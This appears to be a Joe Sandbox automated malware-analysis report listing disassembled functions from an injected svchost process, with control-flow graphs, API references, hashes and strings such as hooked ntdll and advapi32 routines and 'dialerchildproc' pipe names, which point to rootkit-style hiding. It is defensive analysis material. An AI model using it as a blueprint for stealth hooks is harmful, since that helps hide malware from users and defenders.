                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: bbd561d3a30add4c1150a9458a01d63078364739115671f5aea34e55c8598808
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: 0211807261064182FFE0AB22F90D35D36A4A7D4385FD04124EA0EA3696EFBBC0849F13
                                                              Function 0000026A879C1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0000026A879C1628: GetProcessHeap.KERNEL32 ref: 0000026A879C1633
                                                                • Part of subcall function 0000026A879C1628: HeapAlloc.KERNEL32 ref: 0000026A879C1642
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16B2
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DF
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C16F9
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1719
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1734
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1754
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C176F
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C178F
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17AA
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17CA
                                                              • Sleep.KERNEL32 ref: 0000026A879C1AD7
                                                              • SleepEx.KERNELBASE ref: 0000026A879C1ADD
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17E5
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1805
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1820
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1840
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C185B
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C187B
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1896
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C18A0
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: 5eed58e8f7c032d1df488f6ec5371d2936970acb8e97615792f8d803c15a43b0
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: 2931E5F5240A4581FFD0AB26DA493BD73A4ABC4BD0F0454219E09A77DAFF26C491CE1A
                                                              Function 0000026A8799273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 110 26a8799273c-26a879927a4 call 26a879929d4 * 4 119 26a879929b2 110->119 120 26a879927aa-26a879927ad 110->120 121 26a879929b4-26a879929d0 119->121 120->119 122 26a879927b3-26a879927b6 120->122 122->119 123 26a879927bc-26a879927bf 122->123 123->119 124 26a879927c5-26a879927e6 123->124 124->119 126 26a879927ec-26a8799280c 124->126 127 26a87992838-26a8799283f 126->127 128 26a8799280e-26a87992836 126->128 129 26a87992845-26a87992852 127->129 130 26a879928df-26a879928e6 127->130 128->127 128->128 129->130 131 26a87992858-26a8799286a LoadLibraryA 129->131 132 26a87992992-26a879929b0 130->132 133 26a879928ec-26a87992901 130->133 135 26a879928ca-26a879928d2 131->135 136 26a8799286c-26a87992878 131->136 132->121 133->132 134 26a87992907 133->134 137 26a8799290d-26a87992921 134->137 135->131 139 26a879928d4-26a879928d9 135->139 138 26a879928c5-26a879928c8 136->138 141 26a87992923-26a87992934 137->141 142 26a87992982-26a8799298c 137->142 138->135 143 26a8799287a-26a8799287d 138->143 139->130 145 26a87992936-26a8799293d 141->145 146 26a8799293f-26a87992943 141->146 142->132 142->137 147 26a879928a7-26a879928b7 143->147 148 26a8799287f-26a879928a5 143->148 149 26a87992970-26a87992980 145->149 150 26a87992945-26a8799294b 146->150 151 26a8799294d-26a87992951 146->151 152 26a879928ba-26a879928c1 147->152 148->152 149->141 149->142 150->149 153 26a87992963-26a87992967 151->153 154 26a87992953-26a87992961 151->154 152->138 153->149 156 26a87992969-26a8799296c 153->156 154->149 156->149
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: 57387411ffdeb412b963753acb60f61000c0759ef6c355c86f1a01fa76b5fc3d
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: B5613532B016908BFB94CF15D10872DF3A6FB54BA4F588121DF59277C8DA39D892CB01

                                                              Non-executed Functions

                                                              Function 0000026A879C2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 363 26a879c2b2c-26a879c2ba5 call 26a879e2ce0 366 26a879c2ee0-26a879c2f03 363->366 367 26a879c2bab-26a879c2bb1 363->367 367->366 368 26a879c2bb7-26a879c2bba 367->368 368->366 369 26a879c2bc0-26a879c2bc3 368->369 369->366 370 26a879c2bc9-26a879c2bd9 GetModuleHandleA 369->370 371 26a879c2bdb-26a879c2beb call 26a879d6090 370->371 372 26a879c2bed 370->372 373 26a879c2bf0-26a879c2c0e 371->373 372->373 373->366 377 26a879c2c14-26a879c2c33 StrCmpNIW 373->377 377->366 378 26a879c2c39-26a879c2c3d 377->378 378->366 379 26a879c2c43-26a879c2c4d 378->379 379->366 380 26a879c2c53-26a879c2c5a 379->380 380->366 381 26a879c2c60-26a879c2c73 380->381 382 26a879c2c83 381->382 383 26a879c2c75-26a879c2c81 381->383 384 26a879c2c86-26a879c2c8a 382->384 383->384 385 26a879c2c9a 384->385 386 26a879c2c8c-26a879c2c98 384->386 387 26a879c2c9d-26a879c2ca7 385->387 386->387 388 26a879c2d9d-26a879c2da1 387->388 389 26a879c2cad-26a879c2cb0 387->389 392 26a879c2da7-26a879c2daa 388->392 393 26a879c2ed2-26a879c2eda 388->393 390 26a879c2cc2-26a879c2ccc 389->390 391 26a879c2cb2-26a879c2cbf call 26a879c199c 389->391 395 26a879c2cce-26a879c2cdb 390->395 396 26a879c2d00-26a879c2d0a 390->396 391->390 397 26a879c2dbb-26a879c2dc5 392->397 398 26a879c2dac-26a879c2db8 call 26a879c199c 392->398 393->366 393->381 395->396 402 26a879c2cdd-26a879c2cea 395->402 403 26a879c2d3a-26a879c2d3d 396->403 404 26a879c2d0c-26a879c2d19 396->404 399 26a879c2dc7-26a879c2dd4 397->399 400 26a879c2df5-26a879c2df8 397->400 398->397 399->400 406 26a879c2dd6-26a879c2de3 399->406 407 26a879c2e05-26a879c2e12 lstrlenW 400->407 408 26a879c2dfa-26a879c2e03 call 26a879c1bbc 400->408 409 26a879c2ced-26a879c2cf3 402->409 411 26a879c2d3f-26a879c2d49 call 26a879c1bbc 403->411 412 26a879c2d4b-26a879c2d58 lstrlenW 403->412 404->403 410 26a879c2d1b-26a879c2d28 404->410 414 26a879c2de6-26a879c2dec 406->414 420 26a879c2e14-26a879c2e1e 407->420 421 26a879c2e35-26a879c2e3f call 26a879c3844 407->421 408->407 426 26a879c2e4a-26a879c2e55 408->426 418 26a879c2cf9-26a879c2cfe 409->418 419 26a879c2d93-26a879c2d98 409->419 422 26a879c2d2b-26a879c2d31 410->422 411->412 411->419 415 26a879c2d5a-26a879c2d64 412->415 416 26a879c2d7b-26a879c2d8d call 26a879c3844 412->416 425 26a879c2dee-26a879c2df3 414->425 414->426 415->416 427 26a879c2d66-26a879c2d79 call 26a879c152c 415->427 416->419 430 26a879c2e42-26a879c2e44 416->430 418->396 418->409 419->430 420->421 431 26a879c2e20-26a879c2e33 call 26a879c152c 420->431 421->430 422->419 432 26a879c2d33-26a879c2d38 422->432 425->400 425->414 434 26a879c2e57-26a879c2e5b 426->434 435 26a879c2ecc-26a879c2ed0 426->435 427->416 427->419 430->393 430->426 431->421 431->426 432->403 432->422 440 26a879c2e63-26a879c2e7d call 26a879c85c0 434->440 441 26a879c2e5d-26a879c2e61 434->441 435->393 444 26a879c2e80-26a879c2e83 440->444 441->440 441->444 447 26a879c2ea6-26a879c2ea9 444->447 448 26a879c2e85-26a879c2ea3 call 26a879c85c0 444->448 447->435 450 26a879c2eab-26a879c2ec9 call 26a879c85c0 447->450 448->447 450->435
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 28832ac34e84ece53f7b50bb78eaf8a37b486e288825972d32e086a5872c7075
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 42B17A76210A9082EFE8DF25D4487AD77A5FB94B84F445026EE0977798EF36CC80CB42
                                                              Function 0000026A879C7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: 938e5285386ac3705a1524c506204be3636963da77c64c4e1ce6b6d8eddc6828
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 50315072205B808AEBA0DF60E8847ED7B64F785744F44442AEB4D67B98EF39C548CB11
                                                              Function 0000026A879CD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: d1d1b9292f01f4f5fbfa14a2dc646865464e2607e4ff46e76a86c3c994235719
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: DC318132214F8086EBA0DF25E88439E7BA4F7C9798F540126EA9D53B98EF39C545CF01
                                                              Function 0000026A879C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: 07cfe981894990384c0c086665b30c926e9edc38e061a20603f020415e03ff94
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 70514A76204B8486EB94CF62E54835EBFA1F78AFD9F048124EA4A57758EF3DC049CB01
                                                              Function 0000026A879C1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: dfe63a10a49480e1aef6057fb1ce33c2d81f6763df8e5d6cfa68f1b74ee8636c
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: EF31C8B5144A4AA0FE94EF65E85A7EC3B24F784348FC04013954933176AFBEC289CF92
                                                              Function 0000026A87996910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 205 26a87996910-26a87996916 206 26a87996918-26a8799691b 205->206 207 26a87996951-26a8799695b 205->207 209 26a87996945-26a87996984 call 26a87996fc0 206->209 210 26a8799691d-26a87996920 206->210 208 26a87996a78-26a87996a8d 207->208 214 26a87996a9c-26a87996ab6 call 26a87996e54 208->214 215 26a87996a8f 208->215 228 26a87996a52 209->228 229 26a8799698a-26a8799699f call 26a87996e54 209->229 212 26a87996922-26a87996925 210->212 213 26a87996938 __scrt_dllmain_crt_thread_attach 210->213 219 26a87996927-26a87996930 212->219 220 26a87996931-26a87996936 call 26a87996f04 212->220 217 26a8799693d-26a87996944 213->217 226 26a87996ab8-26a87996aed call 26a87996f7c call 26a87996e1c call 26a87997318 call 26a87997130 call 26a87997154 call 26a87996fac 214->226 227 26a87996aef-26a87996b20 call 26a87997190 214->227 221 26a87996a91-26a87996a9b 215->221 220->217 226->221 237 26a87996b22-26a87996b28 227->237 238 26a87996b31-26a87996b37 227->238 232 26a87996a54-26a87996a69 228->232 240 26a879969a5-26a879969b6 call 26a87996ec4 229->240 241 26a87996a6a-26a87996a77 call 26a87997190 229->241 237->238 242 26a87996b2a-26a87996b2c 237->242 243 26a87996b39-26a87996b43 238->243 244 26a87996b7e-26a87996b94 call 26a8799268c 238->244 259 26a87996a07-26a87996a11 call 26a87997130 240->259 260 26a879969b8-26a879969dc call 26a879972dc call 26a87996e0c call 26a87996e38 call 26a8799ac0c 240->260 241->208 248 26a87996c1f-26a87996c2c 242->248 249 26a87996b45-26a87996b4d 243->249 250 26a87996b4f-26a87996b5d call 26a879a5780 243->250 262 26a87996b96-26a87996b98 244->262 263 26a87996bcc-26a87996bce 244->263 256 26a87996b63-26a87996b78 call 26a87996910 249->256 250->256 272 26a87996c15-26a87996c1d 250->272 256->244 256->272 259->228 281 26a87996a13-26a87996a1f call 26a87997180 259->281 260->259 308 26a879969de-26a879969e5 __scrt_dllmain_after_initialize_c 260->308 262->263 269 26a87996b9a-26a87996bbc call 26a8799268c call 26a87996a78 262->269 270 26a87996bd5-26a87996bea call 26a87996910 263->270 271 26a87996bd0-26a87996bd3 263->271 269->263 302 26a87996bbe-26a87996bc6 call 26a879a5780 269->302 270->272 290 26a87996bec-26a87996bf6 270->290 271->270 271->272 272->248 292 26a87996a45-26a87996a50 281->292 293 26a87996a21-26a87996a2b call 26a87997098 281->293 296 26a87996bf8-26a87996bff 290->296 297 26a87996c01-26a87996c11 call 26a879a5780 290->297 292->232 293->292 307 26a87996a2d-26a87996a3b 293->307 296->272 297->272 302->263 307->292 308->259 309 26a879969e7-26a87996a04 call 26a8799abc8 308->309 309->259
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: b047a768bb49e332fa12a0d509f504b7dc68172f8f015219012fb81a31179565
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: DB81D23170524186FBD0EF65944D39D72E1EB87780F588425AA0977796EF3BC9868F03
                                                              Function 0000026A879CCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 0000026A879CCE37
                                                              • FlsGetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCEBC
                                                              • SetLastError.KERNEL32 ref: 0000026A879CCED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,0000026A879CECCC,?,?,?,?,0000026A879CBF9F,?,?,?,?,?,0000026A879C7AB0), ref: 0000026A879CCF2C
                                                                • Part of subcall function 0000026A879CD6CC: HeapAlloc.KERNEL32 ref: 0000026A879CD721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF54
                                                                • Part of subcall function 0000026A879CD744: HeapFree.KERNEL32 ref: 0000026A879CD75A
                                                                • Part of subcall function 0000026A879CD744: GetLastError.KERNEL32 ref: 0000026A879CD764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF76
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: fbbfd203b105abf8085660589179a2c6459f60e277cac02fd6d43f7fad114619
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: F941B13234164882FEF8A735565E37D36965BC67B0F640724A936377E6EE2BC8019E03
                                                              Function 0000026A879C2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: b02012d5428b01c1f3b2143805af3d2ef8a5ba1a4c44cc927d8b5d08adb94f93
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 8C213836618A4082EB50CB25F44836E7BA1F78ABE4F544215EA5913AA8DF7DC189CF02
                                                              Function 0000026A879CA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 584 26a879ca544-26a879ca5ac call 26a879cb414 587 26a879ca5b2-26a879ca5b5 584->587 588 26a879caa13-26a879caa1b call 26a879cc748 584->588 587->588 589 26a879ca5bb-26a879ca5c1 587->589 591 26a879ca5c7-26a879ca5cb 589->591 592 26a879ca690-26a879ca6a2 589->592 591->592 596 26a879ca5d1-26a879ca5dc 591->596 594 26a879ca6a8-26a879ca6ac 592->594 595 26a879ca963-26a879ca967 592->595 594->595 599 26a879ca6b2-26a879ca6bd 594->599 597 26a879ca969-26a879ca970 595->597 598 26a879ca9a0-26a879ca9aa call 26a879c9634 595->598 596->592 600 26a879ca5e2-26a879ca5e7 596->600 597->588 601 26a879ca976-26a879ca99b call 26a879caa1c 597->601 598->588 610 26a879ca9ac-26a879ca9cb call 26a879c7940 598->610 599->595 603 26a879ca6c3-26a879ca6ca 599->603 600->592 604 26a879ca5ed-26a879ca5f7 call 26a879c9634 600->604 601->598 607 26a879ca894-26a879ca8a0 603->607 608 26a879ca6d0-26a879ca707 call 26a879c9a10 603->608 604->610 614 26a879ca5fd-26a879ca628 call 26a879c9634 * 2 call 26a879c9d24 604->614 607->598 611 26a879ca8a6-26a879ca8aa 607->611 608->607 619 26a879ca70d-26a879ca715 608->619 616 26a879ca8ba-26a879ca8c2 611->616 617 26a879ca8ac-26a879ca8b8 call 26a879c9ce4 611->617 652 26a879ca648-26a879ca652 call 26a879c9634 614->652 653 26a879ca62a-26a879ca62e 614->653 616->598 623 26a879ca8c8-26a879ca8d5 call 26a879c98b4 616->623 617->616 632 26a879ca8db-26a879ca8e3 617->632 625 26a879ca719-26a879ca74b 619->625 623->598 623->632 629 26a879ca887-26a879ca88e 625->629 630 26a879ca751-26a879ca75c 625->630 629->607 629->625 630->629 633 26a879ca762-26a879ca77b 630->633 634 26a879ca9f6-26a879caa12 call 26a879c9634 * 2 call 26a879cc6a8 632->634 635 26a879ca8e9-26a879ca8ed 632->635 637 26a879ca874-26a879ca879 633->637 638 26a879ca781-26a879ca7c6 call 26a879c9cf8 * 2 633->638 634->588 639 26a879ca8ef-26a879ca8fe call 26a879c9ce4 635->639 640 26a879ca900 635->640 643 26a879ca884 637->643 665 26a879ca7c8-26a879ca7ee call 26a879c9cf8 call 26a879cac38 638->665 666 26a879ca804-26a879ca80a 638->666 648 26a879ca903-26a879ca90d call 26a879cb4ac 639->648 640->648 643->629 648->598 663 26a879ca913-26a879ca961 call 26a879c9944 call 26a879c9b50 648->663 652->592 669 26a879ca654-26a879ca674 call 26a879c9634 * 2 call 26a879cb4ac 652->669 653->652 657 26a879ca630-26a879ca63b 653->657 657->652 662 26a879ca63d-26a879ca642 657->662 662->588 662->652 663->598 685 26a879ca815-26a879ca872 call 26a879ca470 665->685 686 26a879ca7f0-26a879ca802 665->686 670 26a879ca87b 666->670 671 26a879ca80c-26a879ca810 666->671 690 26a879ca676-26a879ca680 call 26a879cb59c 669->690 691 26a879ca68b 669->691 675 26a879ca880 670->675 671->638 675->643 685->675 686->665 686->666 694 26a879ca686-26a879ca9ef call 26a879c92ac call 26a879caff4 call 26a879c94a0 690->694 695 26a879ca9f0-26a879ca9f5 call 26a879cc6a8 690->695 691->592 694->695 695->634
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: 444f81f33de08ab68ee44032b3efa5b7945037919697de8df49d031d9224469b
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: E2E1C172604B80CAEFA0DF65D58939D77A0F799BA8F100116EE8967B99CB35C581CF02
                                                              Function 0000026A87999944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
